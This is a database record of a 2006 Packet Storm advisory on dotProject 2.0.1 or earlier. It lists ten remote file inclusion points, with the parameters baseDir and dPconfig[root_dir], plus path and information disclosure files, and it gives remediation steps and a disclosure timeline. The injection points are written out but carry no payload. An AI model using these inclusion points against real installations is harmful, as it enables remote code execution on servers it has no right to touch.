{"edition": 1, "title": "dotProject-2.0.1.txt", "bulletinFamily": "exploit", "published": "2006-02-14T00:00:00", "lastseen": "2016-11-03T10:29:28", "history": [], "modified": "2006-02-14T00:00:00", "reporter": "Robin Verton", "hash": "0091ca7906ed765737bdadbf9f7f9376c71b3a24c80c0b5378e244475ba52cb7", "sourceHref": "https://packetstormsecurity.com/files/download/43861/dotProject-2.0.1.txt", "viewCount": 0, "href": "https://packetstormsecurity.com/files/43861/dotProject-2.0.1.txt.html", "description": "", "type": "packetstorm", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "fcf70075ad89fbfdd260c109399997b3"}, {"key": "modified", "hash": "a0ffb473bea64436876a30b16372231c"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a0ffb473bea64436876a30b16372231c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bea21a59b13536020661d5c1155a8e06"}, {"key": "sourceData", "hash": "56ae954893d898f8bfd8b87e3647dd54"}, {"key": "sourceHref", "hash": "4c8173e1bd2a9e1e38aa032b444f25d0"}, {"key": "title", "hash": "8c50071007125852917c7a9eae376b3e"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:29:28"}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:28"}, "vulnersScore": -0.4}, "sourceData": "`dotproject <= 2.0.1 remote code execution \n====================================== \n \nSoftware: dotProject <= 2.0.1 \nSeverity: Arbitrary code execution, Path/Information Disclosure \nRisk: High \nAuthor: Robin Verton <r.verton@gmail.com> \nDate: Feb. 14 2006 \nVendor: dotproject.net [contacted] \n \nDescription: \ndotProject is a volunteer supported Project Management application. \n \nDetails: \nThe 'protection.php' script does not properly validate user-supplied input in the 'siteurl' parameter. \nSome user-supplied input is not checked correctly so an attacker can include a remote php file and \nexecute arbitrary phpcode or arbitrary system command via eval(). \n \nBecause there are over 10 Bugs I only post the vulnerable files + parameters which are not checked. \nTo exploit these vulnerables register_globals have to be set ON (default). \n \n1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE] \n \n2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE] \n \n3) /includes/session.php?baseDir=[REMOTE INCLUDE] \n \n4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE] \n \n5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE] \n \n6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE] \n \n7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE] \n \n8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE] \n \n9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE] \n \n10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE] \n \nThere are also some path discolsure bugs: \n \nNearly ALL files in /db/ give out some nice php-errors by accessing them directly with the parameter \nbaseDir=foobar. \n \nThen, if the /doc/ directory is not deleted (default) you can access to two varoius files which \ndisclose you some system informations: \n \n1) /docs/phpinfo.php - A phpinfo() file. \n \n2) /docs/check.php - Some more informations about the installed dotProject. \n \nSolution: \nTurn register_globals OFF, delete the /docs/ dir and cover /db/ dir with an htaccess. \n \nTimeline: \n24.01.2006 - Bugs found \n26.01.2006 - Vendor Contacted \n14.02.2006 - Publishing \n \nCredits: \nCredits go to Robin Verton (r.verton [at] gmail [dot] com) \n \n`\n", "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "PACKETSTORM:43861"}

{}